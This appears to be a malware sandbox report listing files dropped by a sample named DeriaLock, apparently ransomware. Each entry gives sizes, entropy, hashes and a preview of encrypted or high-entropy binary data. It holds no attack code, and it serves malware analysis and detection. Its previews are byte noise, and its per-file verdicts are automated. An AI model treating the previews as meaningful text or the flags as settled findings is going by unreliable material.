                                                                                                                                                    Preview:.C...aI....X/9......\.o..C.4.b;4O.f.krz....e.H..*o'G.^..\..M....v0_.N.(}y......^..."....es.......I..9...$U....T?.@.X.3....X...m~.G..).ZI.:..69.-..,Wtt....^4........)....KVbe.L.'.3i...7}....L....~N..qr.Q.6%....^,v.....'65.T..e.>D"... .aq5...x....7W..p...[#...@L.@.8Uf..#.9....z<.4c._..^.....I..5.6...(.- .....D.8....6.X..v^....o..}..CV.%$..1.cP>......g{#..C.op5.0..b/..(.....THo..#4'.D(.B.b...L7...g..R.s..6..h.'.a..ok...O........]l.E....A....[[Mi..d.&......uo...7..1.U..g.......4...G...a..6..1....).....U.......*...%.9E.....eH.,c..CG..(Q.7..=......n.4...!T.....t...`.t..5.wA.Zr....o..g) ..`...:.0...2M.,7ZN.T..D...iZ...{...I.,3!j#.hC..L.)..o..9j....K.R<.,{.....X .".....#1/oa.6....m5<....f..."i....\.<.kn...[i......S.hz.....Y+~.....v..U.rU.+<..........e~.l.2........\.....::v.\..#....,a.j..JU(.7..%.J....N.....U,\.....-eUyJk.~..;..ID~<...c.....U...>p.xu...;..........o$.I...;.....G.a..L.i.?.y+......p. .S..!.:...47.L...+,.uM.m....k..q..g...E,}.X.G...l.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.819814279728288
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:DIcgVE71EdwDNHutGVjYxB9bn2ACx2S9Euues8EFeOZEqd3/enLl:U9VqOdw5HyO0xB5n2yS9EzePIdHd2p
                                                                                                                                                    MD5:2A925C2B9390AB8ED60440CB47A41B53
                                                                                                                                                    SHA1:A3C7FD400990A90C90AFE7101A979153D9DA673F
                                                                                                                                                    SHA-256:DBFBCC241B40F5656691C26CB5917D6F096AC4CD3D3C31F816EC0D16358FCB96
                                                                                                                                                    SHA-512:C6E47007CFEA7BF2AF7DA60719C54AE277916F2E3937E75C2AA3C4255DCF42457186DC05F66526B471DF687AC97EEF02D0084575B87BB4B2BA41CE408614E8C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.C...aI....X/9......\.o..C.4.b;4O.f.krz....e.H..*o'G.^..\..M....v0_.N.(}y......^..."....es.......I..9...$U....T?.@.X.3....X...m~.G..).ZI.:..69.-..,Wtt....^4........)....KVbe.L.'.3i...7}....L....~N..qr.Q.6%....^,v.....'65.T..e.>D"... .aq5...x....7W..p...[#...@L.@.8Uf..#.9....z<.4c._..^.....I..5.6...(.- .....D.8....6.X..v^....o..}..CV.%$..1.cP>......g{#..C.op5.0..b/..(.....THo..#4'.D(.B.b...L7...g..R.s..6..h.'.a..ok...O........]l.E....A....[[Mi..d.&......uo...7..1.U..g.......4...G...a..6..1....).....U.......*...%.9E.....eH.,c..CG..(Q.7..=......n.4...!T.....t...`.t..5.wA.Zr....o..g) ..`...:.0...2M.,7ZN.T..D...iZ...{...I.,3!j#.hC..L.)..o..9j....K.R<.,{.....X .".....#1/oa.6....m5<....f..."i....\.<.kn...[i......S.hz.....Y+~.....v..U.rU.+<..........e~.l.2........\.....::v.\..#....,a.j..JU(.7..%.J....N.....U,\.....-eUyJk.~..;..ID~<...c.....U...>p.xu...;..........o$.I...;.....G.a..L.i.?.y+......p. .S..!.:...47.L...+,.uM.m....k..q..g...E,}.X.G...l.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1414608
                                                                                                                                                    Entropy (8bit):7.999865142109503
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:24576:4uHyjr8rVtSnYJKtA/uG/UJKdOuIOFzJW95vZ8gDrphjZ3ylUcr0NfC:Xyjr8PdJK2fdOFAzJGyq7Z3uU008
                                                                                                                                                    MD5:0CB084797BEC1547CFAC0704E60A7A66
                                                                                                                                                    SHA1:195A65C07BF938BCEEAF6C40C5A240DE1661D3B4
                                                                                                                                                    SHA-256:17B9371A7EC9B144A3E4BD061D4B1C9C5EA1ADE7158619CF2FD8F4CA357E0906
                                                                                                                                                    SHA-512:30B502488868ED1E622CF7E5CF177DF184AEEE5D89EAE414EC36AB3DD4AEA5CA639498CCD56646ECE4A329984232950288E6EB792EF9C067E99ABBC02211BBAB
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..sU.^."..u..).8.....>bv...2^%.'.$....G.].rM5..V..@<.).<.?.W...6T..&f..4.......q.Y.V..]/./....}......W.}....Y3.....'..]....1....".."...4.. ^F.VFB.....T..h.....G.&...zZC.y.....w........GFjf..E....\..y.R..A.q69.......PS....F1..E./.Q..._Ju.. ...?.N.]Iy...t.0.%.RB}>....?...x.0...6|..P&.u..k.....rg.......O@...."..2..._A.O........0M...s...qN..KM.k.s....S.......K.....m...}...i.je...o.W.J0.....R+W...J.E..23w,.....>{t.....<<...&..W{*....#..E.P/.....\/..A.....o}j.#-Q.q-./*.A;.-B..;..k.......L.....xv#....81*.-.).fF..e..X..C.y..&a,\}.....y..V)......{M..y.F...m#.....I.....VuA.c..a..h......f......Ec..G......!......K..:Ws.......I6..`.GS...j...n.!...._...].ag.CH:.6...T.......W#s.I2.t..j...M..b....T...O...L........,...m{s.]!.....Q.........D....{.....Q.~..i.VX.......I^.;\J.....{=^o..'M.#..!9@[G.y.V....^r,.Y[...?S..=.cb..m"B<....=.Q.L.)...?..>p9.!..=.....T..{Dy._.=.7n.T.8...b.3.... z..Y....U..*..R.2..%..W.x..<%.b;...A6.........+....F........1.AsW..s
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.817432593596031
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:SzADrxuxcndOGSYuXp9DPk8wtxPctZF4/bUb4FBfB:SzAYxcndOGSYwJk8wtqtz6Ub4FBfB
                                                                                                                                                    MD5:44ED040D6307DE1A2CB7717D75E4C3F9
                                                                                                                                                    SHA1:F50780BEA17B4AD8867BB37D2877AC38527BB2BD
                                                                                                                                                    SHA-256:E8D3A2588053352EF59C6C20069E3738332A8F2EE3E181DC0AA8DAA001858A91
                                                                                                                                                    SHA-512:5A52F36A6AA1CA3983546F0EAF2C3C4A4E4735DFC9FA97BE3F7EA88958D9379EDAF517B4A39B3CBAC4E4B1C8D6883CA777D4C7B4D03A6586655E803520D744A3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:........JB.j.......h...jt..9.....vL.@i...#..9O..co^~.V0.-o.Gv....{....8......q$+..e.Vbw...A.y...l3i.u..d...8..@...e...A]N.5.C...-..@z#...0....x.`.....7.....]...n.V.t.?1N.H.....5z.._.......l.5n........S......R%.'....91.....~S....P..;*..<.b...Bw.....).s.L*..../{..M.'....-.[.j>.....E.DD...>...A-[{.)...... ......C>.o...e.........|..C....8...P....AD.v...eR..m.q..W...7...8....p.......2n.,..%.....^..).d..O.q..w....H....`.^...^d.C.{u...,........l.'...rO./...............zw k.e..s..UxZ<b....[...\.8.....W.......>...e..S..&.l......X..7.#g.....^.BM3.(.....h9..-9&'B..\cu.5.O-......UC..^..........=.+...St...O.5.gbQ$..D.<.[.s.$.K*.|Q.2.l.....A.._&..N.=.....!.....f...0.;.=.wQ_f.......z..6./M3.'.......c.gk...u...Qy.r...0..C.!.m..hJ....... MGx....w..8.N.L....q.=.+=M...[....3..[/....mA.."C5.4..EN..........tJ...V..YxoB..Af6..v^........!...S....j<...u......K....e<..Wx....".."L..h5R2...7L6MIR..Q..fw...sq\..W........{.}..VOs ..X...M....(....[...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.789357220919627
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:sqSrtWJMNWp3QVhzLoY7jMQaaJ7CvbJyKdG8:FjMUp3ahvF7jEKo0KdG8
                                                                                                                                                    MD5:9F88CC2263AD200D8A5632EC17CACA4F
                                                                                                                                                    SHA1:5CBA33A96216778274B7C25E4FA425326E10FC3A
                                                                                                                                                    SHA-256:A2945FD39FF7E733F7187EBE4B4F54F54DC6C692EB47EE8D07624FFEC19D43DB
                                                                                                                                                    SHA-512:ED33EBF48DA4D6A98A768C5D02DFC2299E5FFEF6A7FE739128038D86D23DFDCB5B7934B0AC3A6B0C0B576852FB402086B993FA94B728946CC79D1394D6354672
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:z;S..`N..K_l..].f....W.@Y.w.[.....w..n....{..x.Q..m.0....XDk......{-...0.....h.a5....Z7.oO..D...P,.$.".&.iA. Y.;#..8...B.a........~.o..z...@"?.M.*/.,..0}.v%...>b>Z1..~..J.....>;.>[,..{5p*..L)..^.8-K.B.F...GW..E.5.L.d.m2.Ul.q.^.q0.M.k.L..4.CT.Z@...2.f......5..H+..X..7J..Ew&'.....m:..R......x.`...3e..8m...9.5kj..1P]`....1.s.E.......B....,....)E?/..4._.m..Y... .zA..8....[.[.9C...p...'.ON...a)..S.....8....e...jS.....9 ..Mx.b.U..HM.qg`j.3......0.*.....v.,...m>K...u.>..o..n\......*UW.3.NZ..2....<..s.lA.O .....*..I.=`d.)....r`..`.2v..w..n.t,,....#....r4..zw.]up.Ri.D.?...3.:.3jE....2.E....#..I......A..0.S.....@W.....0..9S.....|8....O.k.8Pll.f.w.or.}E.C..p>.tCs.t-K.f.".u.R;>.h....0....Oi.....#C.H.\.........#E....\E,..\...x..../7....@.r.].1.c-..........dU...bw.S...qER.~.58...L..v...Ft..$.SV.C:+...<.P./.fcc%...LE..`.K&.1.+..CF..csE....-.+.y.cT.E...sv5..........._....E=D.....`.$L....F.r#y.\..*.)...Z.&y.W..E.N..{pp.2.._.O....yZ..r5..8._..N2E.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.809546758534653
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:s30jZF248Nyhb6FiHy6dU6xAIwMQssnKzf88/7:ZZFP8NyyyJduIwMQ3Kz08z
                                                                                                                                                    MD5:5BB57BEAB7012752E1D19A9A0ECD1D9E
                                                                                                                                                    SHA1:2BE9915E946C1C3DC0D50E5A3653E01B79DC0472
                                                                                                                                                    SHA-256:D38CED8AB1A39A61A912E23E3487E32771A024F8DBC77C37DFE53BB9F4972111
                                                                                                                                                    SHA-512:6C1ACDC02E0AF6587A85B2B8BA141AC71FDD84F686AE2646DA42FE59BA146303F7F49AC05DDEA247A01375FEEC68291E0CD5BFEF0FACC74FD8B98892D0F78799
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:I..........[.#....<TM.@.@......}..@...:.kF(.W.W..6-....S.>...w.9..)>...{.P`...eo.3...#.;.bx..P....t.k.Q..:.$....1e(i....?I.~..).i. {..d\X.t..w..[.j..7._.&...z.....7.....6...4..._..j{.;e.F.(...g...v...=...[...s.V.y.34.....H. CX..|p.F.i.)n.;e...%...W.........k....".../.....$...........L..l:..S5.d.G.0A2.....=&..[.P.....'.8.<]y:..u......lk}...Z.l.....P..1....\rM.}.!v`ZD..."..=.~D.~.|jO.....U..l.Ne`$..I.Z>...E-.....N.c8`6..-.....o\.....g%i....:m....?!.2..$e J..Sj..A....W.".\.....s..q...P.:S.Zof.....%.0~".......)..9.a.......V!...v....0.#......4..&....aO.....~.G........}b...:.3\<..........+2 ..2'B3.`....I..O.s..*......).........x...Z....$.....B>..v^.B._..7..k..}_...7......O....x.c.........1..x.W?.`.b/..~...V......U`0=....w0..1...&.....eJ.... T.C$K..V..+..[. .9\.6......)M5......:..E...Mw...{...B...M....Su.F?. ..~...]...@G...C....[....kGj..b..Lnt[...M".....l...Y.T.._.T.<:j+..?.."......)...\..L....an-..MK.l;<=.6j.-w5*.8....,zs..0 ....S...l...m...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.830385766013581
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:PPiWZRW/aKHoG6cLBq/FpdiU0MoKL1wMCug/tjSfWXln:PPiWfW/tFLctpxbbL1wMs6an
                                                                                                                                                    MD5:4E6EEED2895C626D9BEB3DB0FE33F4B0
                                                                                                                                                    SHA1:307F3C13B95ACE180F2537736B58AC8909D50E18
                                                                                                                                                    SHA-256:626241295F265FB65E61352559E8CAB25F884F88497EBBBFC592B7ECF954D60E
                                                                                                                                                    SHA-512:BCA99EF881FC892DC6335FEFF17301C9FA69735B1CE17E61D5F823B45FA668638AF93D707D6256B0D8E51EF643A1B33D84B439C6D2943ADB5C6956950D254ADF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:'..j~...jr........*.2-.Z.5...o.A.h...\..3...6:m...Q...B..8.W;..$R4.a.H.Bz.+..F..p..rR.)..o....5'...p...n).. ...i..nQ..q.....-.8P]........W.[..8`G/X..$B..o_...Fm..ZZ..}N...a..b.38p.>.A..'...x@.(......o..jP;3..;..=.. .EY! .0......+%(}..e.....i...E...8..C..uI3.P$...5..Z....2f.<>.......<..X.....aP.<.y.>n.P..XkP.q.....i.1...(..^.&.X.....6....P..2..^Mcn..56j...g...bt/.,#...p.E.?.....T. !.p".Y...f....=S6.foZ>y......zp..%...e..'.2z;.{s."[-.\..l,.....JE.2.....Wm`A.(j.h/.:.hV\..H.e2..P.........z.d..z....T...A6h.1Q..6~...V..r.."..bOxd.f.#..u.0.)......{P...9.3x.-...U.?....5......m..9........wd..9..}>.o.{.."%.u6.}.}..v.]K.......&...N......{._.6..M2.Px.a.d. H....3......f.`..u..X.^...d.DqU.RU..hsT.JVP@...(.zr6...9I.s..4a.5.0"$ExA.t.'v.{.s..4l;..T..2%#..<T:$...>.K..=..S/..[..q.p..2...1....@Bc.^5H..FZ.g..L.........?.O&,...#......K.c.......W.a..i`;.......||Z.Z.....ql>}].+..|.....<.+f.B..=.6$i.E.Z..zK..B....@.B...9.j.....3...."....$G....ls....a.w..`.s{i
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.826481263815441
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TwXPq2v/meQ4zoWNqpzXMROQ7KEtyiUNHa9PRE7nun:UPheeLEWNEXrhEkvNHalRAu
                                                                                                                                                    MD5:699ADE916929D67F68654FE2BDBC9A89
                                                                                                                                                    SHA1:BE123A3237D860911464A801DFE62A3DAC54660F
                                                                                                                                                    SHA-256:5789A3A6F66BFFD523310AF0ACDB8C23CBF7E2D1F867AFA1597D649D6E2CE13B
                                                                                                                                                    SHA-512:88ACE58F8F7A1D47C8798ACF7CE0D60002F598794A64A2615E6839E12F2EE9510DFAA4D57C6CF7E687F3C1F6E7E5758546F373A9C00A8C4CE31375BC68544728
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.....WK..pr<k.....F-...a..<0..d..p....i.......|...NTT..5...s..[OQ..r.....l.;o.(.;.W....O..\........;..\...in. 8&i..9y..O.y....5..(.i.v.LT.>n..G).[......n......I.........Oh..(f...k....},4.....*...Kz.....sB4o.p...._n..+..d...=....:$....W |.$.d.W......T.....j99.r...(h.;#f.G*.z.X.....}6/m. !/?.w^.%...m....$P.j..dnk,.B...I....b.......I.>.&+..v.?...[Mk2.8v0.......&.t8.w,..K.....\....Eo.g.s.{..3b...%..../=.GK.*=..U..l.........w.....Z.V}m..d..P..\+..!7..,[.........RZs...J.1.\j...~..X....9L.O6p.......Xu..T...?..aG..>..z....^h..@z..=S#.]%h.P.(].......Z.OS.w.o^.......%n......t...i}....GB.M.S....1GITz....."wv.m.dn..T_....^...%'.5Q..R*.#........5."....16..:k. ....4......t...G..W.A....x.<o..oB...B|........v....'...u.D.eDC.r...V..Pr.T.1@.Q...;..i. .R(.|....U...x.`h.....=....^.H3.......k..,.6...K........O.{Z..{Q..6.%.L7.;.1G.(........)...Kl.H.E..V.-@2.G.....If...o.......4y.n'@.+M....r........3..S....He.m..&..o......./.r.r.M.....^..T.79..?.J.@.....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.82440143803396
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:O2DsoTEcas1hxOUmxKH3UPn1N8CV/V3oeiZJ0i:fBgczhx7mxM4ZV/tLiZSi
                                                                                                                                                    MD5:8131A0FFD3F62E68CC0E5593FE705477
                                                                                                                                                    SHA1:160010A6FEF99FECA47186A5249480DB2DA64849
                                                                                                                                                    SHA-256:71201844DA4692BA7F925760D376D4A62CFAF690C7B1E52CFB7053EB299AB491
                                                                                                                                                    SHA-512:DD3B348F6F17A48B2D184761E9F343DD49206E63FB4234A3676B65988FAA6F8F5B321C8C4CC228E70598854232165FB6F3BF284DCE1572BD4BA4EC3B59F45869
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...&c.=....r.-.CVW..Ye.,..C...&Pw..g..0....c....=.`.|....`.x..M...}..U8.W......-A..1.......v........i..x......|...]0....^l.ee.zK.[....3......U.^3'...9.w...66/.f...}h...?..B...y..+XJ1e...i..1k.......I.H.......j....6O"(8.ur..Q..\...m.E...pj{L.D..?..../.X+eK)...j.c.}.....zW=+./.....b...q.p...I&.S....."..#........y.....:,v]|......`D.=H....Qhb..P...AGujP....6{.......F...nQ...)...I.R...V4.w.+..7....H....*7.......Y.H.P.w.~e.....w...'.Z...8.|m""B.$6...@.?..P...'<".`G.P.....-.,.`..`q.....v.........U.................,.k..ifm..z.......{.p=;b....$.:..s(&......GB..M...-...~....W........b.%S.]...<..-`?.(&..=.(.........m..~.....S...[.k;2-.O...#....y..j.1......\....8.<.$...Rx......@.r..,..I...K.....;F4r'|G....[!........G....V.....2a....o.&&c...i./.IO...f.z..v7.'..B........T.N.iQm. ..(......eu.L....8...[..u%....M.x...~.D..>.b.^.-..u../j.e,.N.......^. :.k..mU...m\trK....F.&+2.....6|V....J..l./.....+..E_.A.g,"q.R..OD..8......K/!...q...X..x.>fW,....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.824117775615902
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:eFLAUWIzVnFljb1iLHZcjwEU81MhI9+6wn:eFLA2zFjZUCwes6wn
                                                                                                                                                    MD5:2EC787EEF9F9EFDBD340A9CB0D3D4D36
                                                                                                                                                    SHA1:CB7C1135BFCDC7BF6E1BE69DB342B34665B352D3
                                                                                                                                                    SHA-256:EBB9457201990693DC1DEF1C4F1F7462EBB12B3FCDD7C5B67F46E96B5F78C169
                                                                                                                                                    SHA-512:481499A356BF304597DE36E87D7AA1797B676FCA506632D41375142A960569C781D00B0679A91DA37E037AADCBC6B79A820B59D0739E537E0D402B947C63CBAF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:+4.x......`....<..t.uAn...JmUM.Ik(?i.a}-.i<.a.....{..A...=..M..r/..;...Q.i....e[.?l..{....:.e..........+..Z.}Z..S.n..~...dj!.T...}..N+..`81..J..D).a.C...L.z..I.....Y..X..-....E.....uY.......q..Gs........Me2M.e..>.b....|*..(...Gt...y.O....TW]wy/f+..6.bF..........g`.?K...8;L.u.il..r.).J3.O.-<....ku...D=~.W..w..;...AOs.d8.<.k........._..Yrq..>BG..ux..6..A.....3]k.J~..5.U.q.A.\0^;X\k..m.b2=.@P.........+Mqj....'j.Mc&...r..7o../.u.f.DC.vo../r...qw..c..&..2..B..e..6.B.:..`....E.3.*.<...rX.......Ef..B...r..Q4\..H....(..N...[+....=...Xa.O..3.....CV.;...1..q(=y^...............v....j.5AG.#k,......%.m......N..NV?%..[+Z+....:\...zK.k...O......."O8].e...(zd....#........\Ebe.......t..n.K.>.."{8f.......4...F...1$...R ^........+.V*&...Qpo.b.2.gy.7'.oY.hu.......D.Kf....j..i^=../$I2.?...Gb....f...&k`X........F....... /.....4./.........].........j.Q..=.}o..[.O...z%IE.......N...E@... C..(..(6.4.....-L...?%,.gH}..3).K.U..&.Dy;..h.........phhR..O9.S2?Q
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.82440143803396
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:O2DsoTEcas1hxOUmxKH3UPn1N8CV/V3oeiZJ0i:fBgczhx7mxM4ZV/tLiZSi
                                                                                                                                                    MD5:8131A0FFD3F62E68CC0E5593FE705477
                                                                                                                                                    SHA1:160010A6FEF99FECA47186A5249480DB2DA64849
                                                                                                                                                    SHA-256:71201844DA4692BA7F925760D376D4A62CFAF690C7B1E52CFB7053EB299AB491
                                                                                                                                                    SHA-512:DD3B348F6F17A48B2D184761E9F343DD49206E63FB4234A3676B65988FAA6F8F5B321C8C4CC228E70598854232165FB6F3BF284DCE1572BD4BA4EC3B59F45869
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...&c.=....r.-.CVW..Ye.,..C...&Pw..g..0....c....=.`.|....`.x..M...}..U8.W......-A..1.......v........i..x......|...]0....^l.ee.zK.[....3......U.^3'...9.w...66/.f...}h...?..B...y..+XJ1e...i..1k.......I.H.......j....6O"(8.ur..Q..\...m.E...pj{L.D..?..../.X+eK)...j.c.}.....zW=+./.....b...q.p...I&.S....."..#........y.....:,v]|......`D.=H....Qhb..P...AGujP....6{.......F...nQ...)...I.R...V4.w.+..7....H....*7.......Y.H.P.w.~e.....w...'.Z...8.|m""B.$6...@.?..P...'<".`G.P.....-.,.`..`q.....v.........U.................,.k..ifm..z.......{.p=;b....$.:..s(&......GB..M...-...~....W........b.%S.]...<..-`?.(&..=.(.........m..~.....S...[.k;2-.O...#....y..j.1......\....8.<.$...Rx......@.r..,..I...K.....;F4r'|G....[!........G....V.....2a....o.&&c...i./.IO...f.z..v7.'..B........T.N.iQm. ..(......eu.L....8...[..u%....M.x...~.D..>.b.^.-..u../j.e,.N.......^. :.k..mU...m\trK....F.&+2.....6|V....J..l./.....+..E_.A.g,"q.R..OD..8......K/!...q...X..x.>fW,....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.826831936665716
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:1Yn8sR1myYaMc3ToUyGKKYLlP/j1PdrORJjq+64ergVy0:1YNmva5sUSfP/jBdrgNqQ4gl
                                                                                                                                                    MD5:2D9435FB4CA16C8AC33CB4F4D6E1031C
                                                                                                                                                    SHA1:59920CDE8C306535A56CF3C4A5D64A55E249E49B
                                                                                                                                                    SHA-256:446997D519A4A2F23389E2B684A650A80BB89310973F3264711CE7EFA413E14D
                                                                                                                                                    SHA-512:45C56ABB343BF64A32F343EE06877C0617BECAA5844BD727AE984AB1106FF4F1775CD3D5C7FD2DB0FD48D2B598EC1799CED50E1C35C45D9DAFABA1808ADCEB38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.....I.=..=.(z.{...CA....K.?.L...:.~N..?%.%q.&-=.Ciw....&.{.?G.?S....w.]..G.S...&.j8.....D...{.9.......f......$.M..E.(.&.y...l...3A.......a.31|n??.....m...ir.0).Mw=A.'P.a.%u..^ES.c.Y........d..0......Y...n...q..v....((......v.:...b...7.9Z.....S.G.~KA..o..m.....>.........G.w.8.......[j..aF..=8.......+..#...C2C.eY...9..;.h[..EH,.p% ....}.......\.sG.5!..Mmj.&..<.@"Y.....@...i..S.T..*..x..t.`...D.]8..Q.J...."r....=...mm...._.....(.u....A..z..P...g..CX0.B]..@..n40.i..*.m._tUvp.b}..{.3.c.......<..5._....n.Q...z.W..cD...L..o...,..=...U...j.0..M..[BN......haV.....f.n.\.....oi7yJ&m.b...9..E..dtqd.?%s.lSB..a.....gg.P..l...._....n....'|<..0../L.4@.:nD....?.qd}H...<.z.h.x.5v}..K....(A@.W. ....1....8...0K.....W.4.}(x.A.....(.L...P......:Hj.......{......;@..70>..@{x.rx..M.../..*...z...y.I3.HK.nM...r%.....Wj..4........l8x...+...5..yb....c...Oz...mG...|.p..q...."c.A..xW$.n.a...|)..!.r..A...W.A..t:=H.N$..=..e.j....%.L...|..j1.G.zo.KC.....d>... ....
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.849448243765758
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:lcY1Qr4IfdxxHAoa3EHHuipJsrkWO8STuByk03iM6:wUuHeo5nu0FWiuBMI
                                                                                                                                                    MD5:5BB0419B34E9B3FE490C9A3F3B094225
                                                                                                                                                    SHA1:663D6EF7D7927C1869A36B72D1706ED59A919239
                                                                                                                                                    SHA-256:00DB2CFF4AA309D6C581ED9EE5913A5A5C34400F2374CF1F36C98DC2717797ED
                                                                                                                                                    SHA-512:808F02E1E71C06DB9F3B7F76C61EDC1ED3592257A32BE8436F2B4BE26F8C8C73B6C6A1B0125BBB809EBDC8E963CEEC56CA8DEC33464ACB20EDDAE5B33925FC1D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:\'.M.8..q"-.....h...pI.<...,...VF.3d.v..........Z:...(.nl..0o...q..u....J...<..#.(6~.i8......}..A.{.."..@.D3?b.4..#'@........aQ.J&..i.~.v.Q.q..l..k}ec.@...b..z..f1 ..Q...z.|/.p..;......."...l.h-=N..L.3..&.+.w....[..%r.4..o..8.Ts.lP;V.t.'+..o..L.j...E.q.....z.=Qt.......!.v.U.3.;..'M"=7...b_.k].0..n....o3,..k..*.L.K.E.t8..M.....Z....2x.qE".....So.j]]...E...bw...A9.q.Q.0.j[..F......`..m...k.8F..>..lF.pI.~Nf....$m.t.RT.ny......XM.L.aj..k_.-[..$IdQ.y2Y|B....dW%....V........(h..jP..|`F......a...M...4.m...1...2...`'.W.op.m..=0.A.A`..Vh.....j^.Y.F.R.....Ib.-.d.C.Y...Jj...'..u...r..,H.........L....[bT..G.w.../-.*J../.L..Q=1@.r.n...5d....$fH..o...G.W.V...MjCd.&.@A..d...f...{c.h....J......v1..D.as........R...G(>.l....g.y+.rE.N..N.\rj-.v..n...D....t].q..K.E.G.L.;.. /..........o..p...P...s.3CZt.$..:.6....;Y..W ...(.l~qp.Z.?kw.2..c..xO....Q....>.........>.R.`.{}N..Q.iw5..)/&...N..Y4,]Ks..j.R.o.I..c.p@..'y.z~.7........[w.`C[y%.qX.xt...|jC..^..}.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.799562140010352
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Wzko8YkQQZ3GNOK/tbdA2AO3po4IvmbzWCef8Y/:Bo8YAZ3GAK/tGG6va6f
                                                                                                                                                    MD5:B674440BE9D98BC94DAA95191672308B
                                                                                                                                                    SHA1:409C98616FFE706D0009A80450C0C840871B36DC
                                                                                                                                                    SHA-256:B2475B6F01652B0EC6EDFB485C02AE49255C5439F150CD3F7CDA38819AB348BF
                                                                                                                                                    SHA-512:AA539EBC6F2AE558C5596C12ADA2D613B87F4509D9FB5A908A12539624F445963AE952C65348ECC9125987007651CF533A9CDF739EFFA046B2DD41958DF59FA2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
